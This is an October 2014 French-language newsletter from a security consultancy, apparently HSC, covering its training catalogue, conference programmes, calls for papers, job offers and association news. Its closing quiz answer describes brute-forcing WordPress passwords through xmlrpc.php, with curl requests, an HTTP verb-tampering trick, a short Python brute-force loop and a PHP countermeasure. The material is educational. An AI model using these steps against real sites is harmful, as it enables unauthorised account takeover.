[Newsletter HSC] N°122 - Octobre 2014

Newsletter d'information de HSC newsletter at hsc-news.com
Mer 1 Oct 16:20:18 CEST 2014


========================================================================
              HSC Newsletter  --  N°122 --  octobre 2014
========================================================================




     « Les deux choses les plus importantes n'apparaissent pas au bilan
       de l'entreprise : sa réputation et ses hommes. »

                                        [ Henry Ford ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial
      2. Le saviez-vous ? La question
      3. HSC sponsor de la conférence SecureParis 2014 le 16 octobre
      4. Appel à communication : Conférence annuelle du Club 27001
      5. Appel à communication : GS-DAYS 2015
      6. Offres d'emploi HSC : consultants débutants et séniors
      7. Agenda des interventions publiques
      8. Prochaines formations HSC
      9. Actualité des associations : Club 27001, OSSIR et Clusif
     10. Le saviez-vous ? La réponse



--[ 1. Éditorial ]-------------------------------------------------------

     Comme chaque année, 800 personnes seront présentes aux Assises de la
 Sécurité à Monaco. Si vous avez la chance d'être parmi ces invités,
 n'hésitez à passer sur le stand de notre nouveau partenaire formation,
 Deloitte France. Vous y trouverez notre catalogue pour l'année 2015.
 
     Les principales nouveautés l'année prochaine seront :
  - Huit formations dont le plan a été validé en collaboration avec l'ANSSI,
    dont notamment : Essentiels techniques de la SSI, RSSI, PKI, sécurité du
    cloud ;
  - Le retour de la formation SANS SEC505, Securing Windows ;
  - Deux nouvelles formations à l'investigation numérique : les formations
    SANS FOR572 pour l'investigation numérique avancée dans les réseaux, et
    SANS FOR585 pour l'investigation numérique avancée dans les ordiphones et
    tablettes (Android, iOS, Blackberry) ;
  - L'intrusion web avancée avec la SEC642, pour tous ceux qui ont suivi
    la SEC542 ;
  - De nouvelles formations sur mesure pour les développeurs.
  
     Par ailleurs, vous trouverez dans le nouveau catalogue toutes les
  explications indispensables sur le Compte Personnel de Formation (CPF), qui
  remplacera le DIF en 2015.

     HSC demeure le partenaire en France d'(ISC)² et du SANS Institute, et
 propose les formations permettant de tenter les certifications LSTI
 en sécurité (ISO27001), continuité (ISO22301) et gestion des risques
 (ISO27005 et EBIOS). HSC est certifié OPQF (www.opqf.com) et ISO9001 par
 Intertek (www.intertek-certification.fr) sur ses formations.

     J'en profite pour remercier les 44 exposants présents aux Assises de la
 Sécurité qui sont des clients des formations HSC. Pour rappel, HSC ne
 débauche pas les ingénieurs venus en formation. C'est pourquoi plus
 de 70 sociétés de service en sécurité nous font confiance pour former et
 certifier leurs ingénieurs.

     Pour tout renseignement ou inscription, contactez-nous :
 formations at hsc.fr -- +33 141 409 704



--[ 2. Le saviez-vous ? La question ]-----------------------------------

    Vous souhaitez réaliser une attaque de mot de passe par dictionnaire sur
 une plateforme Wordpress. La page d'authentification de votre cible,
 http://cible.com/wp-login.php, est restreinte et il vous est impossible d'y
 accéder.

 Comment tout de même réaliser cette attaque par dictionnaire ?

     Réponse au paragraphe 10.



--[ 3. HSC sponsor de la conférence SecureParis 2014 le 16 octobre ]-----

    Venez rencontrer HSC lors de la conférence annuelle SecureParis
 organisée par (ISC)² à Paris au MEDEF IDF, 10 rue du Débarcadère,
 75017 Paris, métro/RER Porte Maillot.
 François Martinelli pour les formations, et Jean-Jacques Cayet pour les
 prestations, seront à votre disposition.

 Programme :

  9h00 : Accueil des participants et café offert
 09h30 : Ouverture par Vincent Rochette, président du chapitre Paris d'(ISC)²
 09h45 : "Le contrôle des technologies de l'information: un bien ou un mal ?"
           . Eric Filiol, directeur de recherche, ESIEA
 10h30 ! "Être victime d'un acte cybercriminel ou d'un incident, est-ce une
         fatalité pour l'entreprise ?"
           . Jean-Marc Grémy, vice-président du CLUSIF & Cabestan Consultant
 11h15 : Pause
 11h30 : "L'ennemi de l'intérieur"
           . Francis Ia, consultant, Guidance Software
 12h15 : "Chapitre Paris d'(ISC)²"
           . Xavier Moltenin vice-président du chapitre parisien d'(ISC)²
             et BASOM Consulting
 12h30 : Déjeuner
 13h30 : "Casse-tête de la protection de la vie privée dans un compagnie
         globalisée"
           . Yves Le Roux, (ISC)² EMEA Advisory Board Member et CA Technologies
 14h15 : "Cloud Computing et Souveraineté des Etats"
           . Richard Gotwe, Interpol
 15h00 : Pause
 15h20 : "Le gabon se normalise sa vision en Cyber Sécurité"
           . Sydney Sylvano Assele, chargé de mission du Président de la
             République gabonaise 
 16h00 : Débat d'experts sur les sujets d'actualité, animé par Hervé Schauer
           . Eric Filiol, Jean-Marc Grémy, Karl Minvielle (EDF)
 17h00 : Réception


     Participation gratuite pour les titulaires du CISSP, 99 euros pour les
 autres, programme et inscription en ligne :
 https://www.isc2.org/EventDetails.aspx?id=11941



--[ 4. Appel à communication : Conférence annuelle du Club 27001 ]-------

     Le Club 27001 (http://www.club-27001.fr/), association à but non
 lucratif, organise à Paris le mardi 24 mars 2015 sa huitième conférence
 annuelle autour des usages des normes ISO 2700X. Cette conférence se
 déroulera à Paris  à l'espace Saint-Martin dans le cadre des
 GS-DAYS (http://www.gsdays.fr).

 La conférence annuelle du Club 27001 privilégie les retours d'expérience
 dans l'utilisation des normes de la série ISO 27000, qu'il s'agisse de la
 mise en oeuvre d'une des normes, leur usage y compris sans certification,
 les difficultés rencontrées et les intérêts perçus.

     Voici les thèmes sur lesquels nous attendons des propositions, sans
 que ceux-ci soient exhaustifs :

  - Mise en oeuvre d'un SMSI
     . Retour d'expérience
     . Reprise de l'existant
     . Comment engager sa direction générale
     . Comment surmonter la peur du SMSI
  - Gestion des risques liés à la sécurité de l'information
     . Retour d'expérience de mise en oeuvre de l'ISO 27005
     . Technique d'entretien et d'implication des métiers
     . Échelles et calcul du risque
     . Interactions avec les autres gestions des risques : opérationnels,
       industriels, CHSCT, financiers, etc.
     . Intérêts de l'ISO 27005 dans les projets, les systèmes embarqués, etc.
     . Usage d'ISO27005 vs usage d'EBIOS, de Mehari ou de RiskIT
  - Versions 2013 des normes ISO27001 et ISO27002
  - Audits internes
     . Mise en place d'audits internes pour le SMSI
     . Mutualisation des audits internes ISO 27001 (avec ISO 9001, etc)
     . Utilisation de l'ISO 19011 et ISO 27006
  - Gestion des incidents liés à la sécurité
     . Retours d'expérience
     . Usage de l'ISO 27035
     . Liens avec d'autres référentiels (NIST SP800-61rev1, etc)
  - Indicateurs, métriques et tableaux de bord
     . Retours d'expérience
     . Usage de l'ISO 27004
     . Liens avec d'autres référentiels (TBSSI de l'ANSSI, NIST SP800-50, etc)
  - Liens entre ISO 27001 et d'autres normes, référentiels ou règlements :
     . Gouvernance de la SSI, de la sécurité en général, de l'IT, du management
       des risques
     . Systèmes de Management Intégrés (ISO 9001, 14001, 20000-1, etc) avec
       ISO 27001
     . Mutualisation, opposition, complémentarité, déclencheur, etc.
     . Cohabitation ISO27001 et ISO 20000-1 / ITIL (services informatiques),
       ISO 27013
     . Coordination entre la SSI (ISO 27001) et la continuité d'activité :
       ISO 22301 (SMCA), ISO 27031 et ISO 22313
     . CobiT (audit informatique, contrôle interne)
     . Utilisations d'ISO 27001 dans le cadre ou concomitamment à d'autres
       référentiels de sécurité : RGS, PCI-DSS, SoX, Bâle II/Solvency II,
       hébergeur de données de santé (agrément ASIP-Santé), ARJEL, WLA, etc.
     . Applications sectorielles de l'ISO 27001 : télécommunications,
       santé (27011, 27799, etc)
  - Certification ISO27001 et audits de SMSI
     . Retour d'expérience des accréditeurs, des organismes de certification,
       des auditeurs et des audités
     . Contrôle de l'appréciation des risques
     . Interprétations de la Déclaration d'Applicabilité
     . Mise à jour des normes d'audit et de certification (ISO 19011,
       ISO 17021, ISO 27006)

     Les propositions doivent faire part d'un retour d'expérience pratique,
 et ne doivent pas être la présentation d'une offre de service, d'un
 produit ou plus généralement d'une solution commerciale. Le comité de
 programme sera sensible à l'aspect pratique des propositions. Cependant, les
 propositions présentant une analyse ou un comparatif fondé sur des tests
 scientifiques pourraient être acceptées.

 Les présentations feront de 35 à 45 minutes et seront en français ou en
 anglais.

 Contenu des soumissions à envoyer à conference at club-27001.fr :
    - Nom de l'auteur, biographie et affiliation
    - Synopsis d'une page maximum de l'intervention avec un plan de celle-ci
    - Format libre

 Calendrier 
    - 17 janvier 2015 : date limite de réception des soumissions
    - 31 janvier 2015 : notification aux auteurs et
                        publication du pré-programme
    - 28 février 2015 : publication du programme définitif
    - 10 mars 2015 : réception des présentations
    - 24 mars 2015 : conférence


 Le comité de programme est composé des membres de l'association élus au
 conseil d'administration, soit :
     - Bertrand Augé, Kleverware
     - Thomas Bousson, On'X-Edelweb
     - Claire Cossard, CNAM-TS
     - Francis Delbos, ID Nouvelles
     - Eric Doyen, Humanis
     - Emmanuel Garnier, Systalians
     - Loïc Guézo, Trendmicro
     - Thomas Lebouc, Ipanema
     - Florence Le Goff, Solucom
     - Carl Roller, Akamai
     - Hervé Schauer, HSC



--[ 5. Appel à communication : GS-DAYS 2015  ]---------------------------

     La 6ème édition des GS Days se déroulera le 24 mars 2015 à l'Espace
 Saint-Martin au coeur de Paris, 199 bis, rue Saint-Martin, 75003 Paris.
 L'objectif des GS-Days, Journées francophones de la sécurité, est d'établir
 le dialogue entre le monde de la technique (administrateurs, experts
 sécurité), les RSSI, DSI et les décideurs. Ce colloque, exclusivement en
 français, propose dans un même espace plusieurs cycles de conférences et
 de démonstrations d'exploitation de faille informatique, sous un angle
 technique, organisationnel et juridique.

     Quelques exemples de thèmes sur lesquels nous attendons des soumissions :

 * Systèmes embarqués : objets connectés, systèmes industriels
    - Quelles attaques sur le matériel ?
    - Comment intégrer la sécurité dans ces équipements ?
    - Comment cloisonner le risque ?

 * Mobilité
    - Quelles politiques d'entreprise : BYOD ou COPE ?
    - Nouveaux usages connectés : domotique, m-payment, m-banking ?
    - Les nouvelles attaques orientées terminaux, applications des market
    - Quel niveau de sécurité pour les solutions de MDM ?
    - Quelles contre-mesures à apporter ?

 * Attaques ciblées de haut niveau
    - Synthèse de l'affaire Snowden
    - Arsenal des moyens d'attaques des Etats : matériel ou logiciel,
      botnets étatiques, DDOS
    - Quelle confiance dans les fournisseurs et matériel ?
    - Est-il possible de se protéger ?

 * Gouvernance de l'information 2.0
    - Risques et enjeux de la maîtrise et du partage de grande quantité
      d'informations : Cloud, Big Data, Data Mining
    - Quels enjeux pour le droit français et européen ?

 * Facteurs humains
    - L'ingénierie sociale au travers des réseaux sociaux et autres cercles
      de confiance
    - Nouveaux modes de sensibilisation : e-learning et serious game

 * Continuité et reprise d'activité
    - Quelle place pour l'ISO22301 ?
    - Comment gérer et communiquer une crise ?

 * Régulation
    - Quels effets de la Loi de Programmation Militaire (LPM), des nouvelles
      Directives Nationales de Sécurité (DNS), de la PSSI d l'Etat ?
    - Quels effets du RGSv2 pour les autorités administratives ?
    - Le droit peut-il encore quelque chose pour la protection de
      l'information ? Protection de la vie privée ? Secret des affaires ?

     Les présentations attendues devront proposer une vision technique ou
 scientifique. Les présentations à fin commerciale ou la présentation d'un
 produit ne seront pas acceptées. Cependant, les propositions présentant une
 analyse technique de la sécurité d'un produit, un comparatif fondé sur des
 tests scientifiques, et les retours d'expérience avec un aspect
 technologique, seront examinées avec attention.

 Le format des conférences sera de 50 minutes, dont 5 à 10 minutes de
 questions.

     Le comité de Programme est assuré par Global Security Mag, Florence
 Hanczakowski, CLUSIF, Hervé Schauer, HSC, Philippe Humeau, NBS System,
 Paul Such, SCRT, Olivier Revenu, EdelWeb, Maître Diane Mullenex, Cabinet
 Pinsent Masons, Eric Doyen, Vice-président du Club 27001, et Emmanuel Garnier,
 Systalians. Ce comité a pour objectif la sélection des conférenciers et
 du contenu du Colloque.

 Contenu des soumissions à envoyer à Marc.Jacob at globalsecuritymag.com :
    - Nom de l'auteur, biographie et affiliation
    - Catégorie de la soumission (technique/organisationelle/juridique)
    - Synopsis d'une à 2 pages de l'intervention avec un plan de celle-ci
    - Format PDF préféré.

  Calendrier
     - 9 janvier 2014 : date limite de réception des soumissions
     - 26 janvier 2014 : notification aux auteurs
     - 13 mars 2014 : réception des présentations définitives
     - 24 mars 2014 de 8h30 à 18h30 : conférence



--[ 6. Offres d'emploi HSC pour consultants en sécurité & continuité ]---

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluri-disciplinaire, qui couvre tous les aspects liés à la sécurité et
 continuité, des tests d'intrusion à l'expertise judiciaire, de la
 rétroingénierie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc, pour des missions d'expertise
 variées et haut-de-gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la
 gare Saint-Lazare. Les locaux sont spacieux et climatisés (735 m2), avec
 réfectoire et espace détente. Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 7. Agenda des interventions publiques ]------------------------------

 - 16 octobre 2014 - Conférence SecureParis - Paris
   Animation de la table-ronde par Hervé Schauer
   https://www.isc2.org/EventDetails.aspx?id=11941

 - 6 novembre 2014 - AppSec Forum 2014 - Yverdon (Suisse)
   "De la sécurité IT à la Cyberdéfense" - Keynote invitée - Hervé Schauer
   http://2014.appsec-forum.ch/

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 8. Prochaines formations HSC ]---------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27001 Lead Auditor    ..............    : 15 au 19 septembre (#)
        Essentiel de PCI-DSS    ................    : 22 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 22 au 26 septembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 22 au 26 septembre (#)
        Correspondant Informatique et Libertés      : 24 au 26 septembre (@)
        Essentiels techniques de la SSI    .....    : 29 et 30 septembre
        ISO 22301 Lead Implementer    ..........    : 29 sept au 3 octobre (#)
        Essentiels de l'ISO27001:2013    .......    : 6 octobre
        Formation RSSI    ......................    : 6 au 10 octobre
        Essentiels juridiques pour gérer la SSI     : 13 et 14 octobre
        Formation CISSP    .....................    : 13 au 17 octobre (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 13 au 17 octobre(*)(#)(C)
        ISO 27005 Risk Manager    ..............    : 20 au 22 octobre (#)
        ISO 27001 Lead Auditor    ..............    : 20 au 25 octobre (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 20 au 25 octobre (*)(#)
        Mesures de sécurité ISO 27002:2013   ...    : 23 au 24 octobre
        Sécurité du Cloud Computing    .........    : 27-29 octobre
        RGS : la SSI pour le secteur public    .    : 30 octobre
        ISO 22301 Lead Auditor    ..............    : 3 au 7 novembre (#)
        Rétroingénierie de logiciels malfaisants
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 3 au 7 novembre (*)(#)
        Essentiels Informatique et Liberté   ...    : 12 novembre
        EBIOS Risk Manager    ..................    : 12 au 14 novembre (#)
        ISO 27005 Risk Manager    ..............    : 12 au 14 novembre (#)
        Sécurité SCADA  ........................    : 13 at 14 novembre (*)
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 17 au 21 novembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 17 au 21 novembre (#)
        ISO 27005 Risk Manager    ..............    : 24 au 26 novembre (#)
        Outils et techniques d'analyse
        (SANS FOR610/GIAC GREM)   ..............    : 24 au 28 novembre (*)
        Formation DNSSEC   .....................    : 27 et 28 novembre (*)
        ISO 27001 Lead Auditor    ..............    : 1 au 5 décembre (#)
        Correspondant Informatique et Libertés      : 3 au 5 décembre (@)
        Tests d'intrusion avancés, exploitation de
        failles et hacking éthique (SEC660/GXPN)    : 1 au 6 décembre (*)(#)
        Essentiels de l'ISO27001:2013    .......    : 8 décembre
        Expert Sécurité Linux    ...............    : 8 au 12 décembre (*)(#)
        Indicateurs & tableaux de bord SSI/ISO27004 : 11 décembre
        Gestion des incidents de sécurité/ISO27035  : 12 décembre
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Risk Manager Avancé    .................    : 18 et 19 décembre
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : 23 au 27 mars 2015 (*)(#)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 20 au 24 avril (*)(#)
        PKI : principes et mise en oeuvre    ...    : 4 au 6 mai 2015 (*)
        Gestion de crise IT/SSI    .............    : 19 juin 2015
        Inforensique réseau avancée (SANS FOR572)   : 1 au 5 juin 2015 (*)
        Essentiels de l'ISO22301    ............    : 11 septembre
        Sécurité du WiFi    ....................    : 9 et 10 novembre 2015 (*)
        Inforensique ordiphones/tablettes (FOR585)  : 16 au 20 novembre (*)(#)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 23 au 27 novembre (*)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 14 au 18 décembre (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 27001 Lead Implementer    ..........    : 29 sept au 4 octobre (#)
        ISO 27005 Risk Manager    ..............    : 8 au 10 octobre (#)
        ISO 22301 Lead Implementer    ..........    : 27 au 31 octobre (#)
        Formation CISSP    .....................    : 18 au 22 mai 2015 (#)

 - Lyon
        Essentiels juridiques pour gérer la SSI     : 28 au 29 novembre
        Correspondant Informatique et Libertés      : 4 au 6 mai 2015 (@)

 - Marseille
        Essentiels juridiques pour gérer la SSI     : 15 au 16 septembre
        Correspondant Informatique et Libertés      : 19 au 21 novembre (@)

 - Rennes
        Essentiels de l'ISO27001:2013    .......    : 4 novembre
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Correspondant Informatique et Libertés      : mai 2015 (@)

 - Toulouse
        Correspondant Informatique et Libertés .    : 1 au 3 octobre (@)
        Essentiels de l'ISO27001:2013    .......    : 17 octobre
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre 2015 (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez François Martinelli
 (remplaçant de Lynda Benchikh qui est en congé maternité du 1er juillet
 jusqu'au 29 octobre 2014) : formations at hsc.fr -- +33 141 409 704

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2014 en PDF sur http://www.hsc-formation.fr/



--[ 8. Actualité des associations : Club 27001, OSSIR et Clusif ]---------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris le jeudi 27 novembre
         - "Présentation du Logiciel Score Compliance" par Corinne Méot
           (Agéris)
         - seconde présentation : faites des propositions
     . Réunion suivante à Paris jeudi 23 janvier 2015
     . Prochaine réunion à Toulouse vendredi 10 octobre à l'aéroport Blagnac
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 14 octobre chez Solucom
         - "Présentation du référentiel de réponse à incident de sécurité"
           par Yann Tourdot (ANSSI)
         - "Vulnerability assessment in cryptographic interfaces" par
           Graham Steel
         - Revue de vulnérabilités
     . Prochain AfterWorks OSSIR à Paris le 18 novembre ou 2 ou 16 décembre
         Réservé aux membres OSSIR, chaque membre peut inviter un non-membre
     . Réunion suivante à Paris le mardi 18 novembre à l'INRIA
         - "Splunk" par Eric Leblonc (Splunk)
         - "etplc.org" par Franck Debiève (Atheos)
         - Revue de vulnérabilités
     . Prochaine réunion à Toulouse mardi 21 octobre à l'Université Tls-1
         - Certifications sécuritaires sur le domaine bancaire" par
           Nathalie Feyt (CESTI Thalès)
         - "Analyse de sécurité des BOX ADSL" par Yann Bachy (LAAS/CNRS)
     . Réunion suivante à Toulouse mardi 16 décembre 2014
         - "Développement de moyens matériels pour la protection des couches
            basses du logiciel" par Benoît Morgan (LAAS/CNRS)
     . Prochaine réunion à Rennes non planifiée.

 o Clusif (http://www.clusif.fr/)
     . Prochaine conférence mardi 14 octobre à 16h00 à la CCI Paris
       http://www.clusif.fr/ sur gestion des journaux, des incidents de
       sécurité, SOC, et CERT, avec R2GS, CGI, ACOSS et Société Générale.



--[ 9. Le saviez-vous ? La réponse ]-------------------------------------

    Et bien si la page d'authentification n'est pas accessible, il est possible
 de contourner le problème via le service xmlrpc.  Afin de vérifier les
 méthodes auxquelles nous avons droit, il nous faut construire le fichier
 get_method.xml suivant :

 -------------------------------------------------------------------
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <methodCall>
 <methodName>system.listMethods</methodName>
 <params></params>
 </methodCall>
 -------------------------------------------------------------------

 Et de lancer la requête :

 $ curl -v -H "User-Agent: Mozilla/5.0" -X POST -d @get_method.xml --url "http://cible.com/xmlrpc.php"

 NB : si cette requête vous renvoie un code d'erreur (403, 400, 501,etc.),
 outre les tests habituels avec les entêtes de provenances "X-*", vérifiez une
 méthode exotique comme :

 $ curl -v -H "User-Agent: Mozilla/5.0" -X TOTO -d @get_method.xml --url "http://cible.com/xmlrpc.php"

 Certaines applications peuvent, en effet, interpréter des méthodes exotiques
 de la même manière qu'un GET. Les restrictions se réalisant sur la méthode GET
 ne sont donc pas déclenchées mais le service est rendu et nous pouvons avoir
 accès à la page. C'est une attaque par "Verb Tampering". Arshan Dabirsiaghi a
 écrit un excellent papier sur ce type d'attaque :
 http://cdn2.hubspot.net/hub/315719/file-1344244110-pdf/download-files/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf?t=1407260509680

 Cela doit nous donner une liste de méthodes autorisées :

 < Server: Apache
 < Connection: close
 < Content-Length: 4224
 < Content-Type: text/xml; charset=UTF-8
 <
 <?xml version="1.0" encoding="UTF-8"?>
 <methodResponse>
   <params>
     <param>
       <value>
       <array><data>
   <value><string>system.multicall</string></value>
 ...
   <value><string>demo.sayHello</string></value>
   <value><string>pingback.extensions.getPingbacks</string></value>
   <value><string>pingback.ping</string></value>
 ...
 <value><string>blogger.getUsersBlogs</string></value>
 <value><string>blogger.getUserInfo</string></value>
 value><string>wp.getUsersBlogs</string></value>
 ...


 Bien, une fois que nous nous sommes assurés que plusieurs méthodes RPC étaient
 à notre disposition, nous vérifions que la méthode blogger.getUserInfo est
 présente. C'est l'une des deux méthodes, avec blogger.getUsersBlogs, ne
 prenant en compte que l'identifiant de l'utilisateur et son mot de passe.
 Il nous suffira alors de créer une fonction de brute force. En python, cela
 donnerait :

 -------------------------------------------------------------------
 #!/usr/bin/python
 import xmlrpclib

 bruteForce(url,listUser, listPassword):
  server = xmlrpclib.Server(url) #url = http://cible.com/xmlrpc.php
  for user in listUser :
     for pwd in listPassword :
         param=['',user,pwd]
         try:
             res=server.blogger.getUserInfo(param)
         except Exception as im :
             pass
         else:
             print " Win \o/ : "+user+" : "+pwd
 -------------------------------------------------------------------

 Pour se protéger de ce genre d'attaque, la meilleure solution reste la
 restriction d'accès (comme sur la page de login).  Il est néanmoins possible
 de désactiver les fonctions non nécessaires dans le fichier function.php de
 votre thème.

 -------------------------------------------
 [...]
 add_filter( 'xmlrpc_methods', 'remove_noneeded_method' );

 function remove_noneeded_method( $methods ) {
  unset( $methods['pingback.extensions.getPingbacks'] );
  unset( $methods['pingback.ping'] );
  unset( $methods['blogger.getUserInfo'] );
  unset( $methods['blogger.getUsersBlogs'] );
  unset( $methods['wp.getUserBlogs'] );

  return $methods;
 } ;
 [...]
 -------------------------------------------






Plus d'informations sur la liste de diffusion newsletter